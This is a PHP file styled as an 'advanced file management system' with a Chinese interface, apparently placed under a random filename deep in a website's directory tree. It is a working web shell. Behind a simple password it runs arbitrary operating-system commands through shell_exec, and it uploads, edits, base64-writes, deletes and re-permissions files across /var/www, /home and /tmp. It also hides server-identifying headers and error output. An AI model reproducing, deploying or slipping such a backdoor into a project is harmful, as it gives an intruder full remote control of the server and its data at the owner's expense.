File: /var/www/vhost/disk-apps/pma.bikenow.co/louis/infancy/KAvEDCSO.php
<?php
/* 安全初始化函数 */
function secure_init() {
    if (function_exists('header_remove')) {
        @header_remove('X-Powered-By');
        @header_remove('Server');
    }
    @header('Content-Type: text/html; charset=UTF-8');
    @header('Cache-Control: no-store, no-cache, must-revalidate');
    if (function_exists('ini_set')) {
        @ini_set('display_errors', '0');
        @ini_set('session.cookie_httponly', '1');
    }
    $_SESSION['secure_token'] = hash('sha256', uniqid(mt_rand(), true));
}
session_start();
secure_init();
$auth_password = 'your_secure_password';
$login_page = false;
if (isset($_POST['password'])) {
    if (hash('sha256', $_POST['password']) === hash('sha256', $auth_password)) {
        $_SESSION['authenticated'] = true;
        header("Location: ?access=".bin2hex(random_bytes(8)));
        exit;
    } else {
        $login_page = true;
    }
}
if (isset($_GET['logout'])) {
    session_unset();
    session_destroy();
    header("Location: ?logout=".bin2hex(random_bytes(8)));
    exit;
}
function get_safe_path($input) {
    
    $allowed_roots = [
        realpath('/home'),
        realpath('/var/www/html'),
        realpath('/tmp'),
        realpath('/var/www')
    ];
    
   
    $decoded_path = urldecode($input);
    
    
    $path = realpath($decoded_path);
    
 
    if ($path === false) {
        error_log("路径解析失败: ".$decoded_path);
        return getcwd();
    }
    
    
    foreach ($allowed_roots as $root) {
        if ($root !== false && strpos($path, $root) === 0) {
            return $path;
        }
    }
    
    error_log("路径不在允许范围内: ".$path);
    return getcwd();
}
// 获取当前路径(确保使用绝对路径)
$current_path = isset($_GET['path']) ? get_safe_path($_GET['path']) : getcwd();
chdir($current_path);
function delete_item($target) {
    if (is_dir($target)) {
        $files = @scandir($target);
        if ($files !== false) {
            foreach ($files as $file) {
                if ($file != '.' && $file != '..') {
                    delete_item("$target/$file");
                }
            }
            @rmdir($target);
        }
    } else {
        @unlink($target);
    }
}
if (isset($_GET['delete'])) {
    if (!empty($_SESSION['authenticated'])) {
        $target = get_safe_path($_GET['delete']);
        delete_item($target);
        $_SESSION['notification'] = ['type'=>'success', 'message'=>'删除成功'];
        header("Location: ?path=".urlencode(dirname($target)));
        exit;
    }
}
if (isset($_POST['new_name']) && !empty($_SESSION['authenticated'])) {
    $name = basename($_POST['new_name']);
    $type = $_POST['new_type'];
    $new_path = "$current_path/$name";
    $success = false;
    
    if ($type === 'file') {
        $success = @file_put_contents($new_path, "<?php // Auto-generated file ?>") !== false;
    } else {
        $success = @mkdir($new_path);
    }
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'创建成功'] 
        : ['type'=>'error', 'message'=>'创建失败'];
    header("Location: ?path=".urlencode($current_path));
    exit;
}
if (isset($_FILES['upload_file']) && !empty($_SESSION['authenticated'])) {
    $upload_path = isset($_POST['upload_path']) ? get_safe_path($_POST['upload_path']) : $current_path;
    $target = "$upload_path/".basename($_FILES['upload_file']['name']);
    $success = false;
    
    if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
        @chmod($target, 0644);
        $success = true;
    }
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'上传成功'] 
        : ['type'=>'error', 'message'=>'上传失败'];
    header("Location: ?path=".urlencode($upload_path));
    exit;
}
if (isset($_POST['file_content']) && !empty($_SESSION['authenticated'])) {
    $file_path = get_safe_path($_POST['file_path']);
    $content = isset($_POST['use_base64']) ? base64_decode($_POST['file_content']) : $_POST['file_content'];
    $success = @file_put_contents($file_path, $content) !== false;
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'保存成功'] 
        : ['type'=>'error', 'message'=>'保存失败'];
    header("Location: ?path=".urlencode(dirname($file_path)));
    exit;
}
if (isset($_POST['command']) && !empty($_SESSION['authenticated'])) {
    $command = $_POST['command'];
    $output = shell_exec($command." 2>&1");
    $_SESSION['command_output'] = $output;
    $_SESSION['notification'] = ['type'=>'success', 'message'=>'命令执行完成'];
    header("Location: ?path=".urlencode($current_path)."&cmd=executed");
    exit;
}
if (isset($_POST['change_permission']) && !empty($_SESSION['authenticated'])) {
    $target_path = get_safe_path($_POST['perm_path']);
    $mode = $_POST['perm_mode'];
    
    if (preg_match('/^[0-7]{3,4}$/', $mode)) {
        if (@chmod($target_path, octdec($mode))) {
            $_SESSION['notification'] = ['type' => 'success', 'message' => '权限修改成功'];
        } else {
            $_SESSION['notification'] = ['type' => 'error', 'message' => '权限修改失败'];
        }
    } else {
        $_SESSION['notification'] = ['type' => 'error', 'message' => '无效的权限模式'];
    }
    
    header("Location: ?path=".urlencode(dirname($target_path)));
    exit;
}
function scan_directory($path) {
    $items = @scandir($path);
    return ($items !== false) ? $items : ['.', '..'];
}
$directory_items = scan_directory($current_path);
function get_permission_info($path) {
    $perms = fileperms($path);
    
    $info = '';
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? 'x' : '-');
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? 'x' : '-');
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? 'x' : '-');
    
    return substr(sprintf('%o', $perms), -4).' ('.$info.')';
}
function format_size($bytes) {
    if ($bytes === 0) return '0 Bytes';
    $k = 1024;
    $sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB'];
    $i = floor(log($bytes) / log($k));
    return round($bytes / pow($k, $i), 2).' '.$sizes[$i];
}
// 修复后的目录链接生成函数
function generate_directory_link($base_path, $dir_name) {
    $full_path = rtrim($base_path, '/').'/'.$dir_name.'/';
    return '?path='.urlencode($full_path);
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>高级文件管理系统</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        :root {
            --primary: #4361ee;
            --secondary: #3f37c9;
            --success: #4cc9f0;
            --danger: #f72585;
            --warning: #f8961e;
            --info: #4895ef;
            --light: #f8f9fa;
            --dark: #212529;
            --gray: #6c757d;
            --white: #ffffff;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #f5f7fb;
            color: #333;
            line-height: 1.6;
        }
        
        .container {
            max-width: 1400px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .header {
            background-color: white;
            border-radius: 10px;
            padding: 20px;
            margin-bottom: 20px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.05);
        }
        
        .page-title {
            font-size: 1.8rem;
            font-weight: 700;
            color: var(--dark);
            margin-bottom: 10px;
        }
        
        .status-bar {
            display: flex;
            justify-content: space-between;
            font-size: 0.9rem;
            color: var(--gray);
        }
        
        .alert {
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
        }
        
        .alert i {
            margin-right: 10px;
            font-size: 1.2rem;
        }
        
        .alert-success {
            background-color: rgba(76, 201, 240, 0.1);
            border-left: 4px solid var(--success);
            color: #0a9396;
        }
        
        .alert-error {
            background-color: rgba(247, 37, 133, 0.1);
            border-left: 4px solid var(--danger);
            color: #ae0d4a;
        }
        
        .card {
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.05);
            margin-bottom: 25px;
            overflow: hidden;
        }
        
        .card-header {
            padding: 15px 20px;
            border-bottom: 1px solid rgba(0,0,0,0.05);
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .card-title {
            font-size: 1.2rem;
            font-weight: 600;
            color: var(--dark);
        }
        
        .card-body {
            padding: 20px;
        }
        
        .breadcrumb {
            display: flex;
            flex-wrap: wrap;
            padding: 10px 0;
            margin-bottom: 20px;
            list-style: none;
        }
        
        .breadcrumb-item {
            color: var(--gray);
        }
        
        .breadcrumb-item a {
            color: var(--primary);
            text-decoration: none;
            transition: all 0.3s ease;
        }
        
        .breadcrumb-item a:hover {
            color: var(--secondary);
            text-decoration: underline;
        }
        
        .breadcrumb-separator {
            margin: 0 10px;
            color: var(--gray);
        }
        
        .file-table {
            width: 100%;
            border-collapse: collapse;
            font-size: 0.95rem;
        }
        
        .file-table th {
            background-color: #f8f9fa;
            padding: 12px 15px;
            text-align: left;
            font-weight: 600;
            color: var(--dark);
            border-bottom: 2px solid #dee2e6;
        }
        
        .file-table td {
            padding: 12px 15px;
            border-bottom: 1px solid #e9ecef;
            vertical-align: middle;
        }
        
        .file-table tr:last-child td {
            border-bottom: none;
        }
        
        .file-table tr:hover td {
            background-color: rgba(67, 97, 238, 0.05);
        }
        
        .file-icon {
            width: 24px;
            height: 24px;
            margin-right: 10px;
            color: var(--primary);
        }
        
        .file-name {
            display: flex;
            align-items: center;
        }
        
        .file-actions {
            display: flex;
            gap: 8px;
        }
        
        .action-btn {
            padding: 6px 12px;
            border-radius: 5px;
            font-size: 0.85rem;
            cursor: pointer;
            transition: all 0.3s ease;
            text-decoration: none;
            display: inline-flex;
            align-items: center;
            border: 1px solid transparent;
        }
        
        .action-btn i {
            margin-right: 5px;
        }
        
        .edit-btn {
            background-color: rgba(67, 97, 238, 0.1);
            color: var(--primary);
            border-color: rgba(67, 97, 238, 0.2);
        }
        
        .edit-btn:hover {
            background-color: rgba(67, 97, 238, 0.2);
        }
        
        .delete-btn {
            background-color: rgba(247, 37, 133, 0.1);
            color: var(--danger);
            border-color: rgba(247, 37, 133, 0.2);
        }
        
        .delete-btn:hover {
            background-color: rgba(247, 37, 133, 0.2);
        }
        
        .perm-btn {
            background-color: rgba(72, 149, 239, 0.1);
            color: var(--info);
            border-color: rgba(72, 149, 239, 0.2);
        }
        
        .perm-btn:hover {
            background-color: rgba(72, 149, 239, 0.2);
        }
        
        .cmd-btn {
            background-color: rgba(248, 150, 30, 0.1);
            color: var(--warning);
            border-color: rgba(248, 150, 30, 0.2);
        }
        
        .cmd-btn:hover {
            background-color: rgba(248, 150, 30, 0.2);
        }
        
        .form-group {
            margin-bottom: 15px;
        }
        
        .form-label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
            color: var(--dark);
        }
        
        .form-control {
            width: 100%;
            padding: 10px 15px;
            border: 1px solid #ced4da;
            border-radius: 5px;
            font-size: 1rem;
            transition: all 0.3s ease;
            font-family: 'Consolas', monospace;
        }
        
        .form-control:focus {
            border-color: var(--primary);
            box-shadow: 0 0 0 0.2rem rgba(67, 97, 238, 0.25);
            outline: none;
        }
        
        .btn {
            padding: 10px 20px;
            border-radius: 5px;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            border: none;
            display: inline-flex;
            align-items: center;
            justify-content: center;
        }
        
        .btn i {
            margin-right: 8px;
        }
        
        .btn-primary {
            background-color: var(--primary);
            color: white;
        }
        
        .btn-primary:hover {
            background-color: #3a56d4;
        }
        
        .btn-danger {
            background-color: var(--danger);
            color: white;
        }
        
        .btn-danger:hover {
            background-color: #d1145a;
        }
        
        .btn-block {
            display: block;
            width: 100%;
        }
        
        .terminal {
            background-color: #1e1e1e;
            color: #f0f0f0;
            border-radius: 5px;
            padding: 15px;
            font-family: 'Consolas', monospace;
            font-size: 0.9rem;
            line-height: 1.5;
            overflow-x: auto;
            margin-bottom: 20px;
            max-height: 300px;
        }
        
        .terminal pre {
            margin: 0;
            white-space: pre-wrap;
            word-break: break-all;
        }
        
        .modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0,0,0,0.5);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 1000;
            opacity: 0;
            visibility: hidden;
            transition: all 0.3s ease;
        }
        
        .modal.show {
            opacity: 1;
            visibility: visible;
        }
        
        .modal-content {
            background-color: white;
            border-radius: 10px;
            width: 100%;
            max-width: 500px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.1);
            transform: translateY(-20px);
            transition: all 0.3s ease;
        }
        
        .modal.show .modal-content {
            transform: translateY(0);
        }
        
        .modal-header {
            padding: 15px 20px;
            border-bottom: 1px solid #dee2e6;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .modal-title {
            font-size: 1.3rem;
            font-weight: 600;
            margin: 0;
        }
        
        .modal-close {
            background: none;
            border: none;
            font-size: 1.5rem;
            cursor: pointer;
            color: var(--gray);
        }
        
        .modal-body {
            padding: 20px;
        }
        
        .modal-footer {
            padding: 15px 20px;
            border-top: 1px solid #dee2e6;
            display: flex;
            justify-content: flex-end;
            gap: 10px;
        }
        
        .tabs {
            display: flex;
            border-bottom: 1px solid #dee2e6;
            margin-bottom: 20px;
        }
        
        .tab {
            padding: 10px 20px;
            cursor: pointer;
            font-weight: 500;
            color: var(--gray);
            border-bottom: 2px solid transparent;
            transition: all 0.3s ease;
        }
        
        .tab.active {
            color: var(--primary);
            border-bottom-color: var(--primary);
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
        }
        
        .directory-link {
            color: var(--primary);
            text-decoration: none;
            transition: all 0.3s ease;
        }
        
        .directory-link:hover {
            text-decoration: underline;
            color: var(--secondary);
        }
        
        .path-display {
            font-family: 'Courier New', monospace;
            background-color: #f8f9fa;
            padding: 5px 10px;
            border-radius: 4px;
            font-size: 0.9rem;
        }
        
        @media (max-width: 768px) {
            .container {
                padding: 15px;
            }
            
            .file-actions {
                flex-direction: column;
                gap: 5px;
            }
            
            .action-btn {
                width: 100%;
                justify-content: center;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <?php if (empty($_SESSION['authenticated'])): ?>
    <div class="card" style="max-width: 500px; margin: 50px auto;">
        <div class="card-header">
            <h2 class="card-title"><i class="fas fa-lock"></i> 系统认证</h2>
        </div>
        <div class="card-body">
            <?php if ($login_page): ?>
            <div class="alert alert-error">
                <i class="fas fa-exclamation-circle"></i>
                <span>认证失败,请重试</span>
            </div>
            <?php endif; ?>
            <form method="post">
                <div class="form-group">
                    <label class="form-label" for="password">认证密码</label>
                    <input type="password" class="form-control" id="password" name="password" required>
                </div>
                <button type="submit" class="btn btn-primary btn-block">
                    <i class="fas fa-sign-in-alt"></i> 登入系统
                </button>
            </form>
        </div>
    </div>
    <?php else: ?>
    <div class="header">
        <div class="page-title">
            <i class="fas fa-folder-open"></i> 高级文件管理系统
        </div>
        <div class="status-bar">
            <span>当前路径: <strong><?= htmlspecialchars($current_path) ?></strong></span>
            <span>PHP版本: <?= phpversion() ?> | 用户: <?= htmlspecialchars(get_current_user()) ?></span>
        </div>
        
        <?php if (!empty($_SESSION['notification'])): 
            $msg = $_SESSION['notification'];
            $class = $msg['type'] === 'success' ? 'alert-success' : 'alert-error';
            $icon = $msg['type'] === 'success' ? 'fa-check-circle' : 'fa-exclamation-circle';
        ?>
        <div class="alert <?= $class ?>">
            <i class="fas <?= $icon ?>"></i>
            <span><?= htmlspecialchars($msg['message']) ?></span>
        </div>
        <?php unset($_SESSION['notification']); endif; ?>
    </div>
    
    <div class="breadcrumb">
        <div class="breadcrumb-item">
            <a href="?path=<?= urlencode(dirname($current_path)) ?>" class="directory-link">
                <i class="fas fa-home"></i> 根目录
            </a>
        </div>
        <?php 
        $path_parts = explode('/', trim($current_path, '/'));
        $current = '';
        foreach ($path_parts as $i => $part) {
            $current .= $part . '/';
            if ($part === '') continue;
            echo '<div class="breadcrumb-separator">/</div>';
            echo '<div class="breadcrumb-item"><a href="?path=/'.urlencode($current).'" class="directory-link">'.htmlspecialchars($part).'</a></div>';
        }
        ?>
    </div>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title"><i class="fas fa-cogs"></i> 快速操作</h2>
        </div>
        <div class="card-body">
            <div class="tabs">
                <div class="tab active" data-tab="create">新建</div>
                <div class="tab" data-tab="upload">上传</div>
                <div class="tab" data-tab="command">命令</div>
            </div>
            
            <div id="create" class="tab-content active">
                <form method="post">
                    <div class="form-group">
                        <label class="form-label" for="new_name">名称</label>
                        <input type="text" class="form-control" id="new_name" name="new_name" required>
                    </div>
                    <div class="form-group">
                        <label class="form-label" for="new_type">类型</label>
                        <select class="form-control" id="new_type" name="new_type" required>
                            <option value="file">文件</option>
                            <option value="folder">文件夹</option>
                        </select>
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-plus"></i> 创建
                    </button>
                </form>
            </div>
            
            <div id="upload" class="tab-content">
                <form method="post" enctype="multipart/form-data">
                    <div class="form-group">
                        <label class="form-label" for="upload_file">选择文件</label>
                        <input type="file" class="form-control" id="upload_file" name="upload_file" required>
                    </div>
                    <div class="form-group">
                        <label class="form-label" for="upload_path">上传路径 (可选)</label>
                        <input type="text" class="form-control" id="upload_path" name="upload_path" value="<?= htmlspecialchars($current_path) ?>">
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-upload"></i> 上传
                    </button>
                </form>
            </div>
            
            <div id="command" class="tab-content">
                <form method="post">
                    <div class="form-group">
                        <label class="form-label" for="command">系统命令</label>
                        <input type="text" class="form-control" id="command" name="command" placeholder="输入要执行的命令" required>
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-terminal"></i> 执行
                    </button>
                </form>
                
                <?php if (isset($_SESSION['command_output'])): ?>
                <div class="terminal mt-3">
                    <pre><?= htmlspecialchars($_SESSION['command_output']) ?></pre>
                </div>
                <?php unset($_SESSION['command_output']); endif; ?>
            </div>
        </div>
    </div>
    
    <?php if (isset($_GET['edit'])): 
        $edit_file = get_safe_path($_GET['edit']);
        if (is_file($edit_file)):
            $file_content = file_get_contents($edit_file);
            $display_content = isset($_GET['b64']) ? base64_encode($file_content) : $file_content;
    ?>
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-edit"></i> 编辑文件: <?= htmlspecialchars(basename($edit_file)) ?>
            </h2>
        </div>
        <div class="card-body">
            <form method="post" id="editor-form">
                <input type="hidden" name="file_path" value="<?= htmlspecialchars($edit_file) ?>">
                <div class="form-group">
                    <textarea class="form-control" name="file_content" rows="15" style="font-family: 'Courier New', monospace;"><?= htmlspecialchars($display_content) ?></textarea>
                </div>
                <div class="form-group">
                    <label>
                        <input type="checkbox" name="use_base64" <?= isset($_GET['b64']) ? 'checked' : '' ?>>
                        使用Base64编码
                    </label>
                </div>
                <button type="submit" class="btn btn-primary">
                    <i class="fas fa-save"></i> 保存
                </button>
                <a href="?path=<?= urlencode(dirname($edit_file)) ?>" class="btn">
                    <i class="fas fa-times"></i> 取消
                </a>
            </form>
        </div>
    </div>
    <?php endif; endif; ?>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-list"></i> 文件列表
            </h2>
        </div>
        <div class="card-body">
            <table class="file-table">
                <thead>
                    <tr>
                        <th>名称</th>
                        <th>类型</th>
                        <th>权限</th>
                        <th>大小</th>
                        <th>修改时间</th>
                        <th>操作</th>
                    </tr>
                </thead>
                <tbody>
                    <?php if ($current_path !== '/'): ?>
                    <tr>
                        <td colspan="6">
                            <a href="<?= generate_directory_link(dirname($current_path), '') ?>" class="directory-link">
                                <i class="fas fa-level-up-alt"></i> 返回上级目录
                            </a>
                        </td>
                    </tr>
                    <?php endif; ?>
                    
                    <?php foreach ($directory_items as $item): 
                        if ($item === '.' || $item === '..') continue;
                        $full_path = "$current_path/$item";
                        $is_dir = is_dir($full_path);
                        $file_size = $is_dir ? '-' : format_size(filesize($full_path));
                        $mod_time = date('Y-m-d H:i:s', filemtime($full_path));
                    ?>
                    <tr>
                        <td>
                            <div class="file-name">
                                <i class="fas <?= $is_dir ? 'fa-folder' : 'fa-file' ?> file-icon"></i>
                                <?php if ($is_dir): ?>
                                    <a href="<?= generate_directory_link($current_path, $item) ?>" class="directory-link">
                                        <?= htmlspecialchars($item) ?>
                                    </a>
                                <?php else: ?>
                                    <a href="?edit=<?= urlencode($full_path) ?>" class="directory-link">
                                        <?= htmlspecialchars($item) ?>
                                    </a>
                                <?php endif; ?>
                            </div>
                        </td>
                        <td><?= $is_dir ? '目录' : '文件' ?></td>
                        <td><?= get_permission_info($full_path) ?></td>
                        <td><?= $file_size ?></td>
                        <td><?= $mod_time ?></td>
                        <td>
                            <div class="file-actions">
                                <?php if (!$is_dir): ?>
                                <a href="?edit=<?= urlencode($full_path) ?>" class="action-btn edit-btn">
                                    <i class="fas fa-edit"></i> 编辑
                                </a>
                                <?php endif; ?>
                                <a href="?delete=<?= urlencode($full_path) ?>" class="action-btn delete-btn" onclick="return confirm('确定删除 <?= htmlspecialchars($item) ?>?')">
                                    <i class="fas fa-trash"></i> 删除
                                </a>
                                <a href="#" class="action-btn perm-btn" onclick="showPermissionModal('<?= htmlspecialchars($full_path) ?>')">
                                    <i class="fas fa-key"></i> 权限
                                </a>
                            </div>
                        </td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>
    </div>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-sign-out-alt"></i> 会话管理
            </h2>
        </div>
        <div class="card-body">
            <a href="?logout=1" class="btn btn-danger">
                <i class="fas fa-sign-out-alt"></i> 退出系统
            </a>
        </div>
    </div>
    <?php endif; ?>
</div>
<!-- 权限修改模态框 -->
<div id="permission-modal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            <h3 class="modal-title"><i class="fas fa-key"></i> 修改权限</h3>
            <button class="modal-close" onclick="closeModal()">×</button>
        </div>
        <div class="modal-body">
            <form id="permission-form">
                <input type="hidden" id="perm-path" name="perm_path">
                <div class="form-group">
                    <label class="form-label" for="perm-mode">权限模式 (例如: 755)</label>
                    <input type="text" class="form-control" id="perm-mode" name="perm_mode" pattern="[0-7]{3,4}" required>
                </div>
            </form>
        </div>
        <div class="modal-footer">
            <button class="btn btn-secondary" onclick="closeModal()">取消</button>
            <button class="btn btn-primary" onclick="submitPermissionForm()">确认</button>
        </div>
    </div>
</div>
<script>
    document.querySelectorAll('.tab').forEach(tab => {
        tab.addEventListener('click', function() {
            document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
            document.querySelectorAll('.tab-content').forEach(c => c.classList.remove('active'));
            
            this.classList.add('active');
            const tabId = this.getAttribute('data-tab');
            document.getElementById(tabId).classList.add('active');
        });
    });
    
    function showPermissionModal(path) {
        document.getElementById('perm-path').value = path;
        document.getElementById('permission-modal').classList.add('show');
        
        fetch('?get_perm=' + encodeURIComponent(path))
            .then(response => response.text())
            .then(mode => {
                if(mode.match(/^[0-7]{3,4}$/)) {
                    document.getElementById('perm-mode').value = mode;
                }
            });
    }
    
    function closeModal() {
        document.getElementById('permission-modal').classList.remove('show');
    }
    
    function submitPermissionForm() {
        const form = document.getElementById('permission-form');
        const formData = new FormData(form);
        formData.append('change_permission', '1');
        
        fetch('', {
            method: 'POST',
            body: formData
        }).then(response => {
            if(response.ok) {
                window.location.reload();
            } else {
                alert('权限修改失败');
            }
        }).catch(error => {
            alert(' ' + error);
        });
    }
    
    document.getElementById('editor-form')?.addEventListener('submit', function(e) {
        const useEncoding = this.querySelector('[name="use_base64"]').checked;
        const textarea = this.querySelector('[name="file_content"]');
        
        if (useEncoding) {
            try {
                textarea.value = btoa(unescape(encodeURIComponent(textarea.value)));
            } catch (err) {
                alert(' ' + err);
                e.preventDefault();
            }
        }
    });
    
    document.querySelectorAll('.directory-link').forEach(link => {
        link.addEventListener('click', function(e) {
            console.log('', this.href);
        });
    });
</script>
</body>
</html>